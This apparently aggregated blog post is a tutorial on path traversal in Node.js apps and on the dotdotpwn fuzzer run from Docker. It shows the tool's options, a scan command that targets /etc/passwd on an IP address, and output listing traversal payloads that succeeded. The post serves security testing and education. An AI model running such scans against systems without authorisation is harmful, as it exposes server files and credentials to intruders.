惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

F
Full Disclosure
WordPress大学
WordPress大学
小众软件
小众软件
Cloudbric
Cloudbric
AWS News Blog
AWS News Blog
腾讯CDC
量子位
人人都是产品经理
人人都是产品经理
大猫的无限游戏
大猫的无限游戏
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
V
Vulnerabilities – Threatpost
Scott Helme
Scott Helme
Hugging Face - Blog
Hugging Face - Blog
博客园_首页
C
CXSECURITY Database RSS Feed - CXSecurity.com
The Hacker News
The Hacker News
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
IT之家
IT之家
Jina AI
Jina AI
Attack and Defense Labs
Attack and Defense Labs
S
SegmentFault 最新的问题
Simon Willison's Weblog
Simon Willison's Weblog
The Cloudflare Blog
阮一峰的网络日志
阮一峰的网络日志
T
Tailwind CSS Blog
Last Week in AI
Last Week in AI
博客园 - 【当耐特】
Google Online Security Blog
Google Online Security Blog
美团技术团队
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
V
Visual Studio Blog
罗磊的独立博客
L
LINUX DO - 最新话题
博客园 - Franky
博客园 - 叶小钗
Apple Machine Learning Research
Apple Machine Learning Research
The Last Watchdog
The Last Watchdog
J
Java Code Geeks
AI
AI
C
Cisco Blogs
酷 壳 – CoolShell
酷 壳 – CoolShell
C
Cyber Attacks, Cyber Crime and Cyber Security
Cisco Talos Blog
Cisco Talos Blog
博客园 - 三生石上(FineUI控件)
雷峰网
雷峰网
Help Net Security
Help Net Security
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
云风的 BLOG
云风的 BLOG
I
Intezer
S
Securelist

NodeJS Security & NodeJS Secure Coding's Blog

Hardening Your npm and pnpm Configs in the Age of Shai-Hulud Argument Injection vulnerability in git-blame@1.4.0 Argument Injection vulnerability in `gits@0.1.8` Command Injection vulnerability in `@fab1o/git@1.4.0` Command Injection vulnerability in `git-contributors` via unsanitized CLI arguments Command Injection vulnerability in `git-q@0.0.3` Command injection vulnerability via unsanitized CLI arguments in touxing/fast-git-clone Command Injection vulnerability in `willitmerge@0.2.1` A Directory Traversal Vulnerability I found in Mastra AI Frameworks MCP Server Mastering NPX: A Cheatsheet for npm and Node.js Power Users Mitigate Supply Chain Security with DevContainers and 1Password for Node.js Local Development The Tale of the Vulnerable MCP Database Server Bad Security Defaults in Mastra AI Frameworks Templates SQL Injection and Bypassing "Read-Only" Mode in Xata's MCP Server Security Advisory for qix npm supply-chain compromise affecting debug and billions of weekly download users How to Mitigate SQL Bypass in MCP Servers Enhancing MCP Server Security: A Guide to Using execFile Argument Injection Vulnerability in ggit How to Bypass Access Control in PostgreSQL in Simple PSQL MCP Server for SQL Injection Command Injection Flaws in ggit: Unveiling a Vulnerability Command Injection Vulnerability in Create MCP Server STDIO Tool Exposes System Monitoring Functions GitHub Kanban MCP Server Command Injection Vulnerability Threatens Developer Workflows Critical Command Injection Flaw in iOS Simulator MCP Server Exposes Development Environments Command Injection Vulnerability Discovered in Codehooks MCP Server: A Critical Security Analysis SSRF Shenanigans in safe-axios: Redirects Open the Backdoor SSRF Vulnerability in safe-axios: Unintended Public Address Classification Bypassing SSRF Safeguards in ssrfcheck: A Case of Incomplete Denylists Don't Be Fooled by Multicast, SSRF Bypass in private-ip Node.js Authentication from Lucia to Better Auth Bypassing SSRF Protection in nossrf: When Your Safeguards Become Loopholes Vue CLI Security Fix to Mitigate NPM Binary Planting Node.js API Security Vulnerabilities with Path Traversal in files-bucket-server Will You Accept These GPT 4o Secure Coding Recommendations? Command Injection Vulnerability in interactive-git-checkout npm package An Introduction to SSRF Bypasses and Denylist Failures Disclosing a Command Injection Vulnerability in `git-checkout-tool` Prisma Raw Query Leads to SQL Injection? Yes and No Flawed Git Promises Library on npm Leads to Command Injection Vulnerability Regex Gone Wrong: How parse-duration npm Package Can Crash Your Node.js App How I found an XSS in the Nuxt MDC Library for Markdown Content Holes in the Safety Net: Bypassing SSRF Protection in safe-axios How to Parse URLs from Markdown to HTML Securely? NPM Ignore Scripts Best Practices as Security Mitigation for Malicious Packages Where to find npm vulnerabilities? How to Hunt for IDOR Vulnerabilities To Exploit Security Misconfiguration? How to Avoid JWT Security Mistakes in Node.js Can a Node.js Secure Code Review Find Future Vulnerabilities? The Okta bcrypt Security Incident and The Bun vs Node.js Angle in Secure By Design Do not use secrets in environment variables and here's how to do it better How to use npm audit How to use yarn audit Raw SQL Queries are Actually Better for Security Than ORMs? Node API Security Is Node.js Secure? URL Regex Validation: what can go wrong? Uncovering a Prototype Pollution Regression in the core Node.js project Deno CLI Vulnerability Repeats npm mistakes: CVE-2024-37150 Security skills for JavaScript developers Understanding and Preventing Prototype Pollution in Node.js How to protect against a security breach in React Server Components IDOR Vulnerability: What is it and how to prevent it? The security vulnerability of serving images via a route as opposed to static middleware in Node.js Why is it considered a bad practice to write raw SQL commands? JS Security Concepts for JavaScript Developers Secure Coding Practices in Node.js Against Path Traversal Vulnerabilities Secure JavaScript Coding Practices Against Command Injection Vulnerabilities To IDOR or Not to IDOR: Insecure Direct Object Reference in JavaScript Applications Explained npm vulnerabilities: reviewing the security of your dependencies Disclosing code injection vulnerabilities in safe-eval-2 npm package Introducing Node.js Security Permissions Model, Threat Model, and Security Releases Common Node.js Security Issues and How to Mitigate Them How JavaScript developers should embrace npm security The XZ backdoor CVE-2024-3094: a JavaScript perspective Node.js Security Best Practices The Case for Node.js Secure Configuration Protecting Against Common Node.js Vulnerabilities Input Validation Security Best Practices for Node.js A Node.js Vulnerability Scanner to Avoid Security Risks of EOL Runtime Versions JavaScript Security Issues in Node.js Applications OWASP Node.js Authentication, Authorization and Cryptography Practices OWASP Node.js Best Practices Guide Secure JavaScript Coding to Avoid Insecure Direct Object References (IDOR) North Korea malware on npm and Ledger connect-kit crypto heist 10 Best Practices for Secure Code Review of Node.js code Node.js and OWASP Top Ten Command Injection: Don't Let Your App Go 'BOOM' Secure Code Review Tips to Defend Against Vulnerable Node.js Code Destroyed by Dashes: How Two Hyphens Cause Argument Injection Vulnerability in blamer npm Package Securing Your Node.js Apps by Analyzing Real-World Command Injection Examples An Introduction to Command Injection Vulnerabilities in Node.js and JavaScript
NodeJS Path Traversal Vulnerability Scanner
2024-11-02 · via NodeJS Security & NodeJS Secure Coding's Blog

In this Node.js Security blog I write a lot about secure coding practices for Node.js applications but today I want to show you a more offensive side of security - a NodeJS path traversal vulnerability scanner.

What is a path traversal vulnerability?

Path traversal vulnerabilities are a type of security vulnerability that allows an attacker to read files on the (Node.js backend) server that they should not be able to read. I mentioned Node.js backend in parenthesis because that is mostly the target but this is also true for any compute and server-side technology such as serving requests from AWS Lambdas, Vercel functions or server-side rendered Nuxt and Next.js API routes.

The existing of a path traversal vulnerability can be used to read sensitive files such as configuration files, source code, and more. Think about what could happen if an attacker could read your .env file or your package.json file - they gain a lot of information about your running Node.js application and can use that information to further attack your application, pivot to other systems or escalate their privileges.

In 2022, I spoke at NodeConf EU, the premier Node.js conference in Europe, about the topic of Path Traversal vulnerabilities in Node.js applications. The talk was titled “Char Wars: The Path Traversal Strikes Back” and you can watch the recording of the talk on YouTube:

In this talk, I demonstrated how path traversal vulnerabilities can be exploited in Node.js applications and how to prevent them. I also demonstrated how the Node.js runtime was vulnerable to this type of attack and how it was fixed. You’re invited to watch the talk recording or read up on this quick write-up that re-caps the steps to reconstruct a path traversal scanner that offensive hackers would use.

A Path Traversal Scanner

So as I said in the intro, in this blog post, I will show you how to use a tool that actively make dynamic HTTP requests to find Path Traversal vulnerabilities in your Node.js applications.

Meet dotdotpwn, a command-line tool (written in Perl! Exotic 😆) that makes use of a dictionary of directory patterns that traverse out of a given path. By sending crafted requests with these path traversal patterns to a running server, the tool enumerates thousands of file paths in aim to find a true positive instance that proves the running server is vulnerable to a path traversal attack.

Executing a Path Traversal Scan

You can clone the dotdotpwn source repository and run it from source, or better yet, you can use a pre-built Docker image that contains all the dependencies and the tool itself, making it easier to run the tool without having to install Perl and its dependencies.

To follow along this write-up, you can refer to my GitHub repository of a Docker container image for dotdotpwn: https://github.com/lirantal/dotdotpwn-docker.git

Based on the above, we can invoke the --help command to see the available options and arguments that the tool dotdotpwn tool accepts:

#
# 1. set up the Docker image first:
# git clone https://github.com/lirantal/dotdotpwn-docker.git
# cd dotdotpwn-docker
# docker build -t dotdotpwn .
#
# 2. run the tool:
docker run --rm -it --name dotdotpwn $(docker build -q .) --help
#
# 3. give it a good 10 minutes - it is fetching assets and building the image

If everything is successful, you should see an output similar to the following:

#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                              - DotDotPwn v3.0.2 -                             #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                               by chr1x & nitr0us                              #
#################################################################################
Usage: dotdotpwn.pl -m <module> -h <host> [OPTIONS]
  Available options:
  -m  Module [http | http-url | ftp | tftp | payload | stdout]
  -h  Hostname
  -O  Operating System detection for intelligent fuzzing (nmap)
  -o  Operating System type if known ("windows", "unix" or "generic")
  -s  Service version detection (banner grabber)
  -d  Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
  -f  Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
  -E  Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
  -S  Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
  -u  URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
  -k  Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
  -p  Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
  -x  Port to connect (default: HTTP=80; FTP=21; TFTP=69)
  -t  Time in milliseconds between each test (default: 300 (.3 second))
  -X  Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
  -e  File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
  -U  Username (default: 'anonymous')
  -P  Password (default: 'dot@dot.pwn')
  -M  HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
  -r  Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
  -b  Break after the first vulnerability is found
  -q  Quiet mode (doesn't print each attempt)
  -C  Continue if no data was received from host

We can now continue to launch a dynamic application security scan against a target server that we suspect is vulnerable to a path traversal attack. The tool accepts a variety of arguments to configure the scan, such as the target URL, the dictionary file to use, the number of threads to use, and more.

docker run --rm -it --name dotdotpwn $(docker build -q .) -m http-url -k "localhost" -f /etc/passwd -t 5 -b -u http://10.10.167.195:3112/public/TRAVERSAL

You’ll specifically notice how we use command-line arguments to filter the noise and focus on true positive results only. The -k argument is used to match a specific string in the response, and the -f argument is used to specify a specific file to look for.

Running the above command will produce output results such as:

[+] http://10.10.167.195:3112/public/\.../etc/passwd
[+] http://10.10.167.195:3112/public//\.../etc/passwd
[+] http://10.10.167.195:3112/public/foo/../etc/passwd
...

The scan continues with HTTP requests to the target server, and if a match is found, it will be printed to the console output and show you the path traversal pattern that was successful.

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。